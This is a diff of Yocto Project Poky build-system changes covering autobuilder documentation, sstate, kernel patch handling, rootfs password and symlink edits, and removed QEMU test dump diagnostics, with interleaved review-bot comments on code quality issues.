+within the :yocto_git:`yocto-autobuilder-helper </yocto-autobuilder-helper>`
+repository. The targets are defined in the ``overrides`` section, a quick
+example could be ``qemux86-64`` which looks like::
"qemux86-64" : {
"MACHINE" : "qemux86-64",
@@ -32,8 +32,8 @@ which looks like::
}
},
-And to expand that, you need the "arch-qemu" entry from
-the "templates" section, which looks like::
+And to expand that, you need the ``arch-qemu`` entry from
+the ``templates`` section, which looks like::
"arch-qemu" : {
"BUILDINFO" : true,
@@ -54,11 +54,11 @@ the "templates" section, which looks like::
}
},
-Combining these two entries you can see that "qemux86-64" is a three step build where the
-``bitbake BBTARGETS`` would be run, then ``bitbake SANITYTARGETS`` for each step; all for
-``MACHINE="qemux86-64"`` but with differing :term:`SDKMACHINE` settings. In step
-1 an extra variable is added to the ``auto.conf`` file to enable wic
-image generation.
+Combining these two entries you can see that ``qemux86-64`` is a three step
+build where ``bitbake BBTARGETS`` would be run, then ``bitbake SANITYTARGETS``
+for each step; all for ``MACHINE="qemux86-64"`` but with differing
+:term:`SDKMACHINE` settings. In step 1, an extra variable is added to the
+``auto.conf`` file to enable wic image generation.
While not every detail of this is covered here, you can see how the
template mechanism allows quite complex configurations to be built up
@@ -88,9 +88,9 @@ roughly consist of:
#. *Obtain yocto-autobuilder-helper*
- This step clones the ``yocto-autobuilder-helper`` git repository.
- This is necessary to prevent the requirement to maintain all the
- release or project-specific code within Buildbot. The branch chosen
+ This step clones the :yocto_git:`yocto-autobuilder-helper </yocto-autobuilder-helper>`
+ git repository. This is necessary to avoid the requirement to maintain all
+ the release or project-specific code within Buildbot. The branch chosen
matches the release being built so we can support older releases and
still make changes in newer ones.
@@ -163,8 +163,9 @@ Autobuilder Worker Janitor
--------------------------
This is a process running on each Worker that performs two basic
-operations, including background file deletion at IO idle (see :ref:`test-manual/understand-autobuilder:Autobuilder Target Execution Overview`: Run clobberdir) and
-maintenance of a cache of cloned repositories to improve the speed
+operations, including background file deletion at IO idle (see
+"Run clobberdir" in :ref:`test-manual/understand-autobuilder:Autobuilder Target Execution Overview`)
+and maintenance of a cache of cloned repositories to improve the speed
the system can checkout repositories.
Shared DL_DIR
@@ -172,7 +173,7 @@ Shared DL_DIR
The Workers are all connected over NFS which allows :term:`DL_DIR` to be shared
between them. This reduces network accesses from the system and allows
-the build to be sped up. Usage of the directory within the build system
+the build to be sped up. The usage of the directory within the build system
is designed to be able to be shared over NFS.
Shared SSTATE_DIR
@@ -180,8 +181,8 @@ Shared SSTATE_DIR
The Workers are all connected over NFS which allows the ``sstate``
directory to be shared between them. This means once a Worker has built
-an artifact, all the others can benefit from it. Usage of the directory
-within the directory is designed for sharing over NFS.
+an artifact, all the others can benefit from it. The usage of the directory
+within the build system is designed for sharing over NFS.
Resulttool
----------
@@ -192,7 +193,7 @@ in a given build and their status. Additional information, such as
failure logs or the time taken to run the tests, may also be included.
Resulttool is part of OpenEmbedded-Core and is used to manipulate these
-json results files. It has the ability to merge files together, display
+JSON results files. It has the ability to merge files together, display
reports of the test results and compare different result files.
For details, see :yocto_wiki:`/Resulttool`.
@@ -206,7 +207,7 @@ are general setup steps that are run once and include:
#. Set up any :term:`buildtools` tarball if configured.
-#. Call "buildhistory-init" if :ref:`ref-classes-buildhistory` is configured.
+#. Call ``buildhistory-init`` if :ref:`ref-classes-buildhistory` is configured.
For each step that is configured in ``config.json``, it will perform the
following:
@@ -250,15 +251,16 @@ Deploying Yocto Autobuilder
===========================
The most up to date information about how to setup and deploy your own
-Autobuilder can be found in README.md in the ``yocto-autobuilder2``
-repository.
+Autobuilder can be found in :yocto_git:`README.md </yocto-autobuilder2/tree/README.md>`
+in the :yocto_git:`yocto-autobuilder2 </yocto-autobuilder2>` repository.
-We hope that people can use the ``yocto-autobuilder2`` code directly but
-it is inevitable that users will end up needing to heavily customise the
-``yocto-autobuilder-helper`` repository, particularly the
-``config.json`` file as they will want to define their own test matrix.
+We hope that people can use the :yocto_git:`yocto-autobuilder2 </yocto-autobuilder2>`
+code directly but it is inevitable that users will end up needing to heavily
+customize the :yocto_git:`yocto-autobuilder-helper </yocto-autobuilder-helper>`
+repository, particularly the ``config.json`` file as they will want to define
+their own test matrix.
-The Autobuilder supports wo customization options:
+The Autobuilder supports two customization options:
- variable substitution
@@ -278,7 +280,7 @@ environment::
$ ABHELPER_JSON="config.json /some/location/local.json"
One issue users often run into is validation of the ``config.json`` files. A
-tip for minimizing issues from invalid json files is to use a Git
+tip for minimizing issues from invalid JSON files is to use a Git
``pre-commit-hook.sh`` script to verify the JSON file before committing
it. Create a symbolic link as follows::
diff --git a/poky/documentation/what-i-wish-id-known.rst b/poky/documentation/what-i-wish-id-known.rst
index 10f746ff1f..fe79bc0129 100644
--- a/poky/documentation/what-i-wish-id-known.rst
+++ b/poky/documentation/what-i-wish-id-known.rst
@@ -29,8 +29,9 @@ contact us with other suggestions.
#. **Get to know the layer index:**
All layers can be found in the :oe_layerindex:`layer index <>`. Layers which
have applied for Yocto Project Compatible status (structure continuity
- assurance and testing) can be found in the :yocto_home:`Yocto Project Compatible index
- </software-over/layer/>`. Generally check the Compatible layer index first,
+ assurance and testing) can be found in the :yocto_home:`Yocto Project
+ Compatible Layers </development/yocto-project-compatible-layers/>` page.
+ Generally check the Compatible layer index first,
and if you don't find the necessary layer check the general layer index. The
layer index is an original artifact from the Open Embedded Project. As such,
that index doesn't have the curating and testing that the Yocto Project
diff --git a/poky/meta-poky/conf/distro/poky.conf b/poky/meta-poky/conf/distro/poky.conf
index a111df8393..7d6eb60cbb 100644
--- a/poky/meta-poky/conf/distro/poky.conf
+++ b/poky/meta-poky/conf/distro/poky.conf
@@ -1,6 +1,6 @@
DISTRO = "poky"
DISTRO_NAME = "Poky (Yocto Project Reference Distro)"
-DISTRO_VERSION = "4.3.1"
+DISTRO_VERSION = "4.3.2"
DISTRO_CODENAME = "nanbield"
SDK_VENDOR = "-pokysdk"
SDK_VERSION = "${@d.getVar('DISTRO_VERSION').replace('snapshot-${METADATA_REVISION}', 'snapshot')}"
diff --git a/poky/meta/classes-global/package_ipk.bbclass b/poky/meta/classes-global/package_ipk.bbclass
index b4b7bc9ac2..64fa237c00 100644
--- a/poky/meta/classes-global/package_ipk.bbclass
+++ b/poky/meta/classes-global/package_ipk.bbclass
@@ -47,6 +47,10 @@ python do_package_ipk () {
do_package_ipk[vardeps] += "ipk_write_pkg"
do_package_ipk[vardepsexclude] = "BB_NUMBER_THREADS"
+# FILE isn't included by default but we want the recipe to change if basename() changes
+IPK_RECIPE_FILE = "${@os.path.basename(d.getVar('FILE'))}"
+IPK_RECIPE_FILE[vardepvalue] = "${IPK_RECIPE_FILE}"
+
def ipk_write_pkg(pkg, d):
import re, copy
import subprocess
@@ -62,7 +66,7 @@ def ipk_write_pkg(pkg, d):
outdir = d.getVar('PKGWRITEDIRIPK')
pkgdest = d.getVar('PKGDEST')
- recipesource = os.path.basename(d.getVar('FILE'))
+ recipesource = d.getVar('IPK_RECIPE_FILE')
localdata = bb.data.createCopy(d)
root = "%s/%s" % (pkgdest, pkg)
diff --git a/poky/meta/classes-global/sstate.bbclass b/poky/meta/classes-global/sstate.bbclass
index 2676f18e0a..5b27a1f0f9 100644
--- a/poky/meta/classes-global/sstate.bbclass
+++ b/poky/meta/classes-global/sstate.bbclass
@@ -937,6 +937,7 @@ def sstate_checkhashes(sq_data, d, siginfo=False, currentcount=0, summary=True,
sstatefile = d.expand("${SSTATE_DIR}/" + getsstatefile(tid, siginfo, d))
if os.path.exists(sstatefile):
+ oe.utils.touch(sstatefile)
found.add(tid)
bb.debug(2, "SState: Found valid sstate file %s" % sstatefile)
else:
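Review bot: the added oe.utils.touch(sstatefile) in sstate_checkhashes runs between the os.path.exists() test and found.add(tid), so a file that disappears in that window (for example during a concurrent cache cleanup) now raises from os.utime, because touch() only swallows PermissionError and EROFS. Consider treating FileNotFoundError as a miss and falling through to the else branch, and add a comment stating why a hash check should refresh the mtime.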
@@ -1183,16 +1184,7 @@ python sstate_eventhandler() {
if not os.path.exists(siginfo):
bb.siggen.dump_this_task(siginfo, d)
else:
- try:
- os.utime(siginfo, None)
- except PermissionError:
- pass
- except OSError as e:
- # Handle read-only file systems gracefully
- import errno
- if e.errno != errno.EROFS:
- raise e
-
+ oe.utils.touch(siginfo)
}
SSTATE_PRUNE_OBSOLETEWORKDIR ?= "1"
diff --git a/poky/meta/classes-recipe/kernel-arch.bbclass b/poky/meta/classes-recipe/kernel-arch.bbclass
index 6a50bbfd42..404f2e7061 100644
--- a/poky/meta/classes-recipe/kernel-arch.bbclass
+++ b/poky/meta/classes-recipe/kernel-arch.bbclass
@@ -74,8 +74,8 @@ TARGET_STRIP_KERNEL_ARCH ?= ""
HOST_STRIP_KERNEL_ARCH ?= "${TARGET_STRIP_KERNEL_ARCH}"
KERNEL_CC = "${CCACHE}${HOST_PREFIX}gcc ${HOST_CC_KERNEL_ARCH} -fuse-ld=bfd ${DEBUG_PREFIX_MAP} -fdebug-prefix-map=${STAGING_KERNEL_DIR}=${KERNEL_SRC_PATH} -fdebug-prefix-map=${STAGING_KERNEL_BUILDDIR}=${KERNEL_SRC_PATH}"
-KERNEL_LD = "${CCACHE}${HOST_PREFIX}ld.bfd ${HOST_LD_KERNEL_ARCH}"
-KERNEL_AR = "${CCACHE}${HOST_PREFIX}ar ${HOST_AR_KERNEL_ARCH}"
-KERNEL_OBJCOPY = "${CCACHE}${HOST_PREFIX}objcopy ${HOST_OBJCOPY_KERNEL_ARCH}"
+KERNEL_LD = "${HOST_PREFIX}ld.bfd ${HOST_LD_KERNEL_ARCH}"
+KERNEL_AR = "${HOST_PREFIX}ar ${HOST_AR_KERNEL_ARCH}"
+KERNEL_OBJCOPY = "${HOST_PREFIX}objcopy ${HOST_OBJCOPY_KERNEL_ARCH}"
KERNEL_STRIP = "${HOST_PREFIX}strip ${HOST_STRIP_KERNEL_ARCH}"
TOOLCHAIN ?= "gcc"
diff --git a/poky/meta/classes-recipe/kernel-yocto.bbclass b/poky/meta/classes-recipe/kernel-yocto.bbclass
index 4ac977b122..4b7c0b829f 100644
--- a/poky/meta/classes-recipe/kernel-yocto.bbclass
+++ b/poky/meta/classes-recipe/kernel-yocto.bbclass
@@ -176,12 +176,32 @@ do_kernel_metadata() {
# kernel source tree, where they'll be used later.
check_git_config
patches="${@" ".join(find_patches(d,'kernel-meta'))}"
- for p in $patches; do
+ if [ -n "$patches" ]; then
(
- cd ${WORKDIR}/kernel-meta
- git am -s $p
- )
- done
+ cd ${WORKDIR}/kernel-meta
+
+ # take the SRC_URI patches, and create a series file
+ # this is required to support some better processing
+ # of issues with the patches
+ rm -f series
+ for p in $patches; do
+ cp $p .
+ echo "$(basename $p)" >> series
+ done
+
+ # process the series with kgit-s2q, which is what is
+ # handling the rest of the kernel. This allows us
+ # more flexibility for handling failures or advanced
+ # mergeing functinoality
+ message=$(kgit-s2q --gen -v --patches ${WORKDIR}/kernel-meta 2>&1)
+ if [ $? -ne 0 ]; then
+ # setup to try the patch again
+ kgit-s2q --prev
+ bberror "Problem applying patches to: ${WORKDIR}/kernel-meta"
+ bbfatal_log "\n($message)"
+ fi
+ )
+ fi
fi
sccs_from_src_uri="${@" ".join(find_sccs(d))}"
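Review bot: in the new series loop, `cp $p .` and `echo "$(basename $p)" >> series` expand $p unquoted and flatten every patch to its basename, so two SRC_URI patches with the same file name in different directories overwrite each other and the series lists that name twice. Quote the expansions and fail early on a duplicate basename. The `$?` test after `message=$(kgit-s2q ...)` is only reached if this function is not running with errexit, so confirm the `kgit-s2q --prev` and bbfatal_log branch is reachable. The added comment also has typos ("mergeing functinoality").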
diff --git a/poky/meta/classes-recipe/meson.bbclass b/poky/meta/classes-recipe/meson.bbclass
index d08a83d555..a85d120d77 100644
--- a/poky/meta/classes-recipe/meson.bbclass
+++ b/poky/meta/classes-recipe/meson.bbclass
@@ -79,7 +79,7 @@ llvm-config = 'llvm-config'
cups-config = 'cups-config'
g-ir-scanner = '${STAGING_BINDIR}/g-ir-scanner-wrapper'
g-ir-compiler = '${STAGING_BINDIR}/g-ir-compiler-wrapper'
-${@rust_tool(d, "HOST_SYS")}
+${@rust_tool(d, "RUST_HOST_SYS")}
${@"exe_wrapper = '${WORKDIR}/meson-qemuwrapper'" if d.getVar('EXEWRAPPER_ENABLED') == 'True' else ""}
[built-in options]
@@ -116,7 +116,7 @@ readelf = ${@meson_array('BUILD_READELF', d)}
objcopy = ${@meson_array('BUILD_OBJCOPY', d)}
llvm-config = '${STAGING_BINDIR_NATIVE}/llvm-config'
pkgconfig = 'pkg-config-native'
-${@rust_tool(d, "BUILD_SYS")}
+${@rust_tool(d, "RUST_BUILD_SYS")}
[built-in options]
c_args = ${@meson_array('BUILD_CFLAGS', d)}
diff --git a/poky/meta/classes-recipe/rootfs-postcommands.bbclass b/poky/meta/classes-recipe/rootfs-postcommands.bbclass
index 06388b72fb..29ee74932a 100644
--- a/poky/meta/classes-recipe/rootfs-postcommands.bbclass
+++ b/poky/meta/classes-recipe/rootfs-postcommands.bbclass
@@ -241,10 +241,10 @@ read_only_rootfs_hook () {
#
zap_empty_root_password () {
if [ -e ${IMAGE_ROOTFS}/etc/shadow ]; then
- sed -i 's%^root::%root:*:%' ${IMAGE_ROOTFS}/etc/shadow
+ sed --follow-symlinks -i 's%^root::%root:*:%' ${IMAGE_ROOTFS}/etc/shadow
fi
if [ -e ${IMAGE_ROOTFS}/etc/passwd ]; then
- sed -i 's%^root::%root:*:%' ${IMAGE_ROOTFS}/etc/passwd
+ sed --follow-symlinks -i 's%^root::%root:*:%' ${IMAGE_ROOTFS}/etc/passwd
fi
}
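Review bot: with --follow-symlinks, sed edits the link target, and an absolute symlink at ${IMAGE_ROOTFS}/etc/shadow or ${IMAGE_ROOTFS}/etc/passwd resolves against the build host's root rather than the image root. Resolve the link relative to ${IMAGE_ROOTFS} (or reject absolute targets) before the in-place edit in zap_empty_root_password, and add a comment naming the layout that makes these files symlinks. --follow-symlinks is a GNU sed option, so this also assumes GNU sed on the build host.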
diff --git a/poky/meta/classes-recipe/testimage.bbclass b/poky/meta/classes-recipe/testimage.bbclass
index 7c56fe9674..f36d941891 100644
--- a/poky/meta/classes-recipe/testimage.bbclass
+++ b/poky/meta/classes-recipe/testimage.bbclass
@@ -109,21 +109,6 @@ TESTIMAGE_DUMP_DIR ?= "${LOG_DIR}/runtime-hostdump/"
TESTIMAGE_UPDATE_VARS ?= "DL_DIR WORKDIR DEPLOY_DIR_IMAGE IMAGE_LINK_NAME"
-testimage_dump_target () {
- top -bn1
- ps
- free
- df
- # The next command will export the default gateway IP
- export DEFAULT_GATEWAY=$(ip route | awk '/default/ { print $3}')
- ping -c3 $DEFAULT_GATEWAY
- dmesg
- netstat -an
- ip address
- # Next command will dump logs from /var/log/
- find /var/log/ -type f 2>/dev/null -exec echo "====================" \; -exec echo {} \; -exec echo "====================" \; -exec cat {} \; -exec echo "" \;
-}
-
testimage_dump_monitor () {
query-status
query-block
@@ -352,7 +337,6 @@ def testimage_main(d):
target_kwargs['serialcontrol_cmd'] = d.getVar("TEST_SERIALCONTROL_CMD") or None
target_kwargs['serialcontrol_extra_args'] = d.getVar("TEST_SERIALCONTROL_EXTRA_ARGS") or ""
target_kwargs['testimage_dump_monitor'] = d.getVar("testimage_dump_monitor") or ""
- target_kwargs['testimage_dump_target'] = d.getVar("testimage_dump_target") or ""
def export_ssh_agent(d):
import os
diff --git a/poky/meta/classes/useradd_base.bbclass b/poky/meta/classes/useradd_base.bbclass
index 863cb7b76c..5e1c699118 100644
--- a/poky/meta/classes/useradd_base.bbclass
+++ b/poky/meta/classes/useradd_base.bbclass
@@ -160,7 +160,7 @@ perform_passwd_expire () {
local username=`echo "$opts" | awk '{ print $NF }'`
local user_exists="`grep "^$username:" $rootdir/etc/passwd || true`"
if test "x$user_exists" != "x"; then
- eval flock -x $rootdir${sysconfdir} -c \"$PSEUDO sed -i \''s/^\('$username':[^:]*\):[^:]*:/\1:0:/'\' $rootdir/etc/shadow \" || true
+ eval flock -x $rootdir${sysconfdir} -c \"$PSEUDO sed --follow-symlinks -i \''s/^\('$username':[^:]*\):[^:]*:/\1:0:/'\' $rootdir/etc/shadow \" || true
local passwd_lastchanged="`grep "^$username:" $rootdir/etc/shadow | cut -d: -f3`"
if test "x$passwd_lastchanged" != "x0"; then
bbfatal "${PN}: passwd --expire operation did not succeed."
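Review bot: the changed sed call in perform_passwd_expire is still followed by `|| true`, so if sed rejects --follow-symlinks or cannot write the link target, the error is discarded and the only signal is the later bbfatal "passwd --expire operation did not succeed", which hides the cause. Let the sed failure reach the log (for example with a bbwarn before continuing) so a broken symlink is distinguishable from a missing shadow entry.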
diff --git a/poky/meta/conf/distro/include/security_flags.inc b/poky/meta/conf/distro/include/security_flags.inc
index 2972f05b4e..d97a6edb0f 100644
--- a/poky/meta/conf/distro/include/security_flags.inc
+++ b/poky/meta/conf/distro/include/security_flags.inc
@@ -69,4 +69,3 @@ SECURITY_LDFLAGS:pn-xserver-xorg = "${SECURITY_X_LDFLAGS}"
TARGET_CC_ARCH:append:pn-binutils = " ${SELECTED_OPTIMIZATION}"
TARGET_CC_ARCH:append:pn-gcc = " ${SELECTED_OPTIMIZATION}"
TARGET_CC_ARCH:append:pn-gdb = " ${SELECTED_OPTIMIZATION}"
-TARGET_CC_ARCH:append:pn-perf = " ${SELECTED_OPTIMIZATION}"
diff --git a/poky/meta/lib/oe/buildcfg.py b/poky/meta/lib/oe/buildcfg.py
index 90f5e05715..b3fe510309 100644
--- a/poky/meta/lib/oe/buildcfg.py
+++ b/poky/meta/lib/oe/buildcfg.py
@@ -1,26 +1,27 @@
+import os
import subprocess
import bb.process
def detect_revision(d):
path = get_scmbasepath(d)
- return get_metadata_git_revision(path, d)
+ return get_metadata_git_revision(path)
def detect_branch(d):
path = get_scmbasepath(d)
- return get_metadata_git_branch(path, d)
+ return get_metadata_git_branch(path)
def get_scmbasepath(d):
return os.path.join(d.getVar('COREBASE'), 'meta')
-def get_metadata_git_branch(path, d):
+def get_metadata_git_branch(path):
try:
rev, _ = bb.process.run('git rev-parse --abbrev-ref HEAD', cwd=path)
except bb.process.ExecutionError:
rev = '<unknown>'
return rev.strip()
-def get_metadata_git_revision(path, d):
+def get_metadata_git_revision(path):
try:
rev, _ = bb.process.run('git rev-parse HEAD', cwd=path)
except bb.process.ExecutionError:
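Review bot: get_metadata_git_branch and get_metadata_git_revision lose their second parameter here, so any caller outside this file that still passes d will fail with a TypeError; only the in-file callers are updated by this patch. Consider keeping an ignored `d=None` argument for a release, or call out the signature change in the commit message. The added `import os` is needed, since get_scmbasepath already uses os.path.join.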
@@ -45,5 +46,5 @@ def get_layer_revisions(d):
layers = (d.getVar("BBLAYERS") or "").split()
revisions = []
for i in layers:
- revisions.append((i, os.path.basename(i), get_metadata_git_branch(i, None).strip(), get_metadata_git_revision(i, None), is_layer_modified(i)))
+ revisions.append((i, os.path.basename(i), get_metadata_git_branch(i).strip(), get_metadata_git_revision(i), is_layer_modified(i)))
return revisions
diff --git a/poky/meta/lib/oe/patch.py b/poky/meta/lib/oe/patch.py
index ff9afc9df9..9b480b2b28 100644
--- a/poky/meta/lib/oe/patch.py
+++ b/poky/meta/lib/oe/patch.py
@@ -772,8 +772,9 @@ class NOOPResolver(Resolver):
self.patchset.Push()
except Exception:
import sys
- os.chdir(olddir)
raise
+ finally:
+ os.chdir(olddir)
# Patch resolver which relies on the user doing all the work involved in the
# resolution, with the exception of refreshing the remote copy of the patch
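Review bot: in NOOPResolver the except block is now just `import sys` followed by a bare `raise`, which does nothing once os.chdir(olddir) has moved into finally. Drop the except clause and the unused import and keep a plain try/finally; the same applies to the `except Exception: raise` left in UserResolver in the next hunk.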
@@ -833,9 +834,9 @@ class UserResolver(Resolver):
# User did not fix the problem. Abort.
raise PatchError("Patch application failed, and user did not fix and refresh the patch.")
except Exception:
- os.chdir(olddir)
raise
- os.chdir(olddir)
+ finally:
+ os.chdir(olddir)
def patch_path(url, fetch, workdir, expand=True):
diff --git a/poky/meta/lib/oe/path.py b/poky/meta/lib/oe/path.py
index 0dc8f172d5..e2f1913a35 100644
--- a/poky/meta/lib/oe/path.py
+++ b/poky/meta/lib/oe/path.py
@@ -125,7 +125,8 @@ def copyhardlinktree(src, dst):
if os.path.isdir(src):
if len(glob.glob('%s/.??*' % src)) > 0:
source = './.??* '
- source += './*'
+ if len(glob.glob('%s/**' % src)) > 0:
+ source += './*'
s_dir = src
else:
source = src
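Review bot: glob.glob('%s/**' % src) is called without recursive=True, so '**' matches exactly what '*' matches; write '%s/*' so the test does not read as a recursive walk. With this change a directory that has neither dot entries nor regular entries leaves source without any pattern, so the code that consumes source below should handle that case explicitly (early return or a comment saying why an empty source is safe).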
diff --git a/poky/meta/lib/oe/utils.py b/poky/meta/lib/oe/utils.py
index a3b1bb1087..14a7d07ef0 100644
--- a/poky/meta/lib/oe/utils.py
+++ b/poky/meta/lib/oe/utils.py
@@ -7,6 +7,7 @@
import subprocess
import multiprocessing
import traceback
+import errno
def read_file(filename):
try:
@@ -528,3 +529,14 @@ def directory_size(root, blocksize=4096):
total += sum(roundup(getsize(os.path.join(root, name))) for name in files)
total += roundup(getsize(root))
return total
+
+# Update the mtime of a file, skip if permission/read-only issues
+def touch(filename):
+ try:
+ os.utime(filename, None)
+ except PermissionError:
+ pass
+ except OSError as e:
+ # Handle read-only file systems gracefully
+ if e.errno != errno.EROFS:
+ raise e
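Review bot: touch() swallows PermissionError and EROFS without any trace, which makes it hard to tell why a cache file's mtime never advances; a bb.debug line in those branches would help. Use a bare `raise` instead of `raise e`, and turn the leading comment into a docstring that states which errors are ignored and that other OSError cases, including a missing file, still propagate.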
diff --git a/poky/meta/lib/oeqa/core/target/qemu.py b/poky/meta/lib/oeqa/core/target/qemu.py
index 6893d10226..d93b3ac94a 100644
--- a/poky/meta/lib/oeqa/core/target/qemu.py
+++ b/poky/meta/lib/oeqa/core/target/qemu.py
@@ -14,8 +14,6 @@ from collections import defaultdict
from .ssh import OESSHTarget
from oeqa.utils.qemurunner import QemuRunner
-from oeqa.utils.dump import MonitorDumper
-from oeqa.utils.dump import TargetDumper
supported_fstypes = ['ext3', 'ext4', 'cpio.gz', 'wic']
@@ -47,14 +45,6 @@ class OEQemuTarget(OESSHTarget):
use_kvm=kvm, use_slirp=slirp, dump_dir=dump_dir, logger=logger,
serial_ports=serial_ports, boot_patterns = boot_patterns,
use_ovmf=ovmf, tmpfsdir=tmpfsdir)
- dump_monitor_cmds = kwargs.get("testimage_dump_monitor")
- self.monitor_dumper = MonitorDumper(dump_monitor_cmds, dump_dir, self.runner)
- if self.monitor_dumper:
- self.monitor_dumper.create_dir("qmp")
-
- dump_target_cmds = kwargs.get("testimage_dump_target")
- self.target_dumper = TargetDumper(dump_target_cmds, dump_dir, self.runner)
- self.target_dumper.create_dir("qemu")
def start(self, params=None, extra_bootparams=None, runqemuparams=''):
if self.use_slirp and not self.server_ip:
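Review bot: OEQemuTarget.__init__ no longer reads kwargs.get("testimage_dump_monitor"), yet testimage.bbclass in this same patch still sets target_kwargs['testimage_dump_monitor'], so on this path the value appears to have no consumer. Either remove the kwarg and the testimage_dump_monitor function from the class as well, or document where the monitor dump is now wired up (targetcontrol.py still constructs MonitorDumper).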
diff --git a/poky/meta/lib/oeqa/core/target/ssh.py b/poky/meta/lib/oeqa/core/target/ssh.py
index f4dd0ca417..09cdd14c75 100644
--- a/poky/meta/lib/oeqa/core/target/ssh.py
+++ b/poky/meta/lib/oeqa/core/target/ssh.py
@@ -48,8 +48,6 @@ class OESSHTarget(OETarget):
if port:
self.ssh = self.ssh + [ '-p', port ]
self.scp = self.scp + [ '-P', port ]
- self._monitor_dumper = None
- self.target_dumper = None
def start(self, **kwargs):
pass
@@ -57,15 +55,6 @@ class OESSHTarget(OETarget):
def stop(self, **kwargs):
pass
- @property
- def monitor_dumper(self):
- return self._monitor_dumper
-
- @monitor_dumper.setter
- def monitor_dumper(self, dumper):
- self._monitor_dumper = dumper
- self.monitor_dumper.dump_monitor()
-
def _run(self, command, timeout=None, ignore_status=True):
"""
Runs command in target using SSHProcess.
@@ -104,14 +93,7 @@ class OESSHTarget(OETarget):
status, output = self._run(sshCmd, processTimeout, ignore_status)
self.logger.debug('Command: %s\nStatus: %d Output: %s\n' % (command, status, output))
- if (status == 255) and (('No route to host') in output):
- if self.monitor_dumper:
- self.monitor_dumper.dump_monitor()
- if status == 255:
- if self.target_dumper:
- self.target_dumper.dump_target()
- if self.monitor_dumper:
- self.monitor_dumper.dump_monitor()
+
return (status, output)
def copyTo(self, localSrc, remoteDst):
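Review bot: after this removal a status of 255 from the SSH command leaves only the debug-level 'Command: ... Status: ...' line, so a lost connection to the target is no longer distinguishable in normal logs. Consider logging at warning level when status == 255, and drop the stray empty line the hunk adds before `return (status, output)`.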
diff --git a/poky/meta/lib/oeqa/selftest/cases/tinfoil.py b/poky/meta/lib/oeqa/selftest/cases/tinfoil.py
index dd13c20402..21c8686b2a 100644
--- a/poky/meta/lib/oeqa/selftest/cases/tinfoil.py
+++ b/poky/meta/lib/oeqa/selftest/cases/tinfoil.py
@@ -48,6 +48,17 @@ class TinfoilTests(OESelftestTestCase):
rd = tinfoil.parse_recipe_file(best[3])
self.assertEqual(testrecipe, rd.getVar('PN'))
+ def test_parse_virtual_recipe(self):
+ with bb.tinfoil.Tinfoil() as tinfoil:
+ tinfoil.prepare(config_only=False, quiet=2)
+ testrecipe = 'nativesdk-gcc'
+ best = tinfoil.find_best_provider(testrecipe)
+ if not best:
+ self.fail('Unable to find recipe providing %s' % testrecipe)
+ rd = tinfoil.parse_recipe_file(best[3])
+ self.assertEqual(testrecipe, rd.getVar('PN'))
+ self.assertIsNotNone(rd.getVar('FILE_LAYERNAME'))
+
def test_parse_recipe_copy_expand(self):
with bb.tinfoil.Tinfoil() as tinfoil:
tinfoil.prepare(config_only=False, quiet=2)
@@ -66,7 +77,7 @@ class TinfoilTests(OESelftestTestCase):
localdata.setVar('PN', 'hello')
self.assertEqual('hello', localdata.getVar('BPN'))
- # The config_data API tp parse_recipe_file is used by:
+ # The config_data API to parse_recipe_file is used by:
# layerindex-web layerindex/update_layer.py
def test_parse_recipe_custom_data(self):
with bb.tinfoil.Tinfoil() as tinfoil:
@@ -80,6 +91,18 @@ class TinfoilTests(OESelftestTestCase):
rd = tinfoil.parse_recipe_file(best[3], config_data=localdata)
self.assertEqual("testval", rd.getVar('TESTVAR'))
+ def test_parse_virtual_recipe_custom_data(self):
+ with bb.tinfoil.Tinfoil() as tinfoil:
+ tinfoil.prepare(config_only=False, quiet=2)
+ localdata = bb.data.createCopy(tinfoil.config_data)
+ localdata.setVar("TESTVAR", "testval")
+ testrecipe = 'nativesdk-gcc'
+ best = tinfoil.find_best_provider(testrecipe)
+ if not best:
+ self.fail('Unable to find recipe providing %s' % testrecipe)
+ rd = tinfoil.parse_recipe_file(best[3], config_data=localdata)
+ self.assertEqual("testval", rd.getVar('TESTVAR'))
+
def test_list_recipes(self):
with bb.tinfoil.Tinfoil() as tinfoil:
tinfoil.prepare(config_only=False, quiet=2)
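Review bot: test_parse_virtual_recipe_custom_data follows the same steps as the custom-data test above it with only testrecipe set to 'nativesdk-gcc', and unlike test_parse_virtual_recipe it does not assert FILE_LAYERNAME. Factor the shared body into a helper parameterised by recipe name, assert FILE_LAYERNAME in both virtual cases if that is the regression being covered, and add a comment saying why 'nativesdk-gcc' was chosen.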
diff --git a/poky/meta/lib/oeqa/targetcontrol.py b/poky/meta/lib/oeqa/targetcontrol.py
index e21655c979..6e8b781973 100644
--- a/poky/meta/lib/oeqa/targetcontrol.py
+++ b/poky/meta/lib/oeqa/targetcontrol.py
@@ -103,7 +103,6 @@ class QemuTarget(BaseTarget):
self.rootfs = os.path.join(d.getVar("DEPLOY_DIR_IMAGE"), d.getVar("IMAGE_LINK_NAME") + '.' + self.image_fstype)
self.kernel = os.path.join(d.getVar("DEPLOY_DIR_IMAGE"), d.getVar("KERNEL_IMAGETYPE", False) + '-' + d.getVar('MACHINE', False) + '.bin')
self.qemulog = os.path.join(self.testdir, "qemu_boot_log.%s" % self.datetime)
- dump_target_cmds = d.getVar("testimage_dump_target")
dump_monitor_cmds = d.getVar("testimage_dump_monitor")
dump_dir = d.getVar("TESTIMAGE_DUMP_DIR")
if not dump_dir:
@@ -144,7 +143,6 @@ class QemuTarget(BaseTarget):
tmpfsdir = d.getVar("RUNQEMU_TMPFS_DIR"),
serial_ports = len(d.getVar("SERIAL_CONSOLES").split()))
- self.target_dumper = TargetDumper(dump_target_cmds, dump_dir, self.runner)
self.monitor_dumper = MonitorDumper(dump_monitor_cmds, dump_dir, self.runner)
if (self.monitor_dumper):
self.monitor_dumper.create_dir("qmp")
diff --git a/poky/meta/lib/patchtest/tests/test_patch.py b/poky/meta/lib/patchtest/tests/test_patch.py
index 65d0f930b0..d7187a0cb1 100644
--- a/poky/meta/lib/patchtest/tests/test_patch.py
+++ b/poky/meta/lib/patchtest/tests/test_patch.py
@@ -6,6 +6,7 @@
#
import base
+import os
import parse_signed_off_by
import parse_upstream_status
import pyparsing
@@ -87,7 +88,7 @@ class TestPatch(base.Base):
if TestPatch.prog.search_string(payload):
break
else:
- self.fail('A patch file has been added without a Signed-off-by tag. Sign off the added patch file (%s)' % newpatch.path)
+ self.fail('A patch file has been added without a Signed-off-by tag: \'%s\'' % os.path.basename(newpatch.path))
def test_cve_tag_format(self):
for commit in TestPatch.commits:
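Review bot: the failure message now prints only os.path.basename(newpatch.path), so when a series adds patches with the same file name under two recipes the report no longer says which one lacks the tag. Keep the path relative to the repository in the message, or add the recipe directory next to the basename; the new wording also drops the instruction to sign off the patch, which was the actionable part.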
